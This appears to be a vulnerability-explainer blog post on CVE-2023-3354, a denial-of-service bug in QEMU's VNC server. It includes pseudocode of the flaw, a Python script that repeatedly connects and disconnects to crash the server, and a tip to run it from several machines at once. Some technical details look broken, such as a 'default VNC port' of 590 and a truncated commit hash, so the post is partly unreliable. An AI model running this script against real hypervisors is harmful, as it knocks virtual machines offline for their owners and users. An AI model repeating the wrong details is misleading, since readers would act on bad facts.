CVE CyberSecurity Database News

CVE-2023-3354 - Denial of Service in QEMU’s VNC Server Explained

Poster -

QEMU is a popular open-source virtual machine platform used everywhere—from home labs to big cloud data centers. It comes with a built-in VNC (Virtual Network Computing) server for remote access to graphical VM consoles. In mid-2023, a serious denial-of-service vulnerability (CVE-2023-3354) was found in the QEMU VNC server’s connection handling code. This flaw allows anyone who can connect to your VNC service port to remotely crash QEMU, taking down virtual machines with it.

Let’s break down CVE-2023-3354 in plain English, see what actually goes wrong, and look at sample code for a simple exploit.

What’s the Vulnerability?

- CVE ID: CVE-2023-3354

Detailed Explanation

The QEMU VNC server lets multiple clients connect, up to a limit (max_clients). When a new client connects and the current number of connections has reached this limit, QEMU tries to cleanly close the *oldest* connection and accept the new one.

The problem appears if the connection being closed is in the *handshake* phase and fails (perhaps because the client disconnected or the handshake is not completed yet). QEMU ends up trying to clean up this half-initialized connection twice, which leads to the server accidentally accessing a NULL pointer.

Once that happens, QEMU crashes with a segmentation fault—which is a fancy way of saying, “game over.”

Technical Walkthrough

Here’s a simplified look at the affected VNC connection logic, based on the commit that fixed it:
Original QEMU patch: https://gitlab.com/qemu-project/qemu/-/commit/f9d6f091d48e3eb5b5675599239eecb94034c41

Buggy Code Snippet (C-like pseudocode)

void vnc_connect() {
    if (num_clients >= max_clients) {
        VncClient *old = cleanup_oldest_client();
        // If 'old' is NULL or half-initialized, 
        // cleanup_oldest_client may already free it
    }
    // ... handshake still incomplete ...
    cleanup_client(client); // double-free or NULL dereference occurs here
}

Key Problem

- If two threads or events race to clean up the same client, or if the client is only half set up, cleanup_client() can be called twice.
- The second call operates on a freed/NULL pointer, crashing the process.

Exploit Steps

This bug is easy to trigger with public tools like netcat or a small Python script.

Hypothetical Exploit (Python 3)

import socket
import time

VNC_HOST = '192.168.x.y'  # Replace with target IP
VNC_PORT = 590           # Default VNC port

def vnc_handshake_disconnect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((VNC_HOST, VNC_PORT))
    # Wait for VNC protocol version banner (e.g., 'RFB 003.008\n')
    banner = s.recv(1024)
    # Disconnect before completing handshake
    s.close()

# Repeat handshake/disconnect rapidly to trigger cleanup race
for i in range(100):
    vnc_handshake_disconnect()
    time.sleep(.01)

If the QEMU server’s max_clients is set low, run this in parallel from several machines for a faster effect. On affected QEMU versions, the process crashes within seconds/minutes of testing.

Upgrade QEMU: All QEMU users should upgrade to a version with the fix (patched after June 2023).

- Official Fix Commit

More Information

- Red Hat CVE Page
- QEMU Security Advisory
- National Vulnerability Database (NVD)

Final Thoughts

This flaw in QEMU’s VNC server is a great reminder: even simple “cleanup” code can let attackers take down whole infrastructures. Always keep your hypervisors updated and don’t expose remote management interfaces to the public internet.

If you’ve got any QEMU version from before June 2023, update ASAP!

Timeline

Published on: 07/11/2023 17:15:00 UTC
Last modified on: 08/29/2023 03:15:00 UTC